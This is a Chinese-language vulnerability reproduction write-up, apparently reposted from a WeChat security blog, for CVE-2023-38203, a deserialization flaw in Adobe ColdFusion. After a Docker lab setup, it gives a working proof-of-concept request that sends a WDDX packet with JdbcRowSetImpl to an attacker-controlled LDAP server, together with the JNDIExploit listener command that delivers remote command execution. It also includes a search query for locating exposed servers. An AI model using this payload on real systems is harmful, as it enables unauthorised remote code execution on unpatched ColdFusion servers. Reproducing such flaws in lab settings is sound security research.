漏洞复现-CVE-2023-38203

admin 2024年3月8日08:15:48评论34 views字数 1128阅读3分45秒阅读模式

一:漏洞描述

Adobe ColdFusion是一款由Adobe Systems开发的服务器端脚本语言和Web应用程序开发平台。它是一种快速开发、强大且易于学习的技术,旨在简化复杂的企业级应用程序开发。该产品存在反序列化漏洞。

二:漏洞影响版本

2018u17(及早期版本) < Adobe ColdFusion < 2021u7(及早期版本)2021u7(及早期版本) < Adobe ColdFusion < 2023u1(及早期版本)

三:网络空间测绘查询

app="Adobe-ColdFusion"

漏洞复现-CVE-2023-38203

四:靶场搭建

取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动容器

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

查看容器

docker ps

漏洞复现-CVE-2023-38203

五:漏洞复现

POC:

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedContent-Length: 290cmd: ls

argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>ldap://192.168.31.59:1389/Basic/TomcatEcho</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

JNDIExploit-1.4-SNAPSHOT.jar 是一个Java工具,用于测试和利用Java命名和目录界面(Java Naming and Directory Interface,JNDI)服务的漏洞。JNDI是Java平台中用于访问各种命名和目录服务的API,通常用于在Java应用程序中查找和访问远程对象。(工具获取在底文)

命令中的192.168.111.131是我本机IP

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.131

漏洞复现-CVE-2023-38203

漏洞复现-CVE-2023-38203

漏洞复现-CVE-2023-38203

六:批量检测

漏洞复现-CVE-2023-38203

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2023-38203

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月8日08:15:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2023-38203https://cn-sec.com/archives/2551635.html

发表评论

匿名网友 填写信息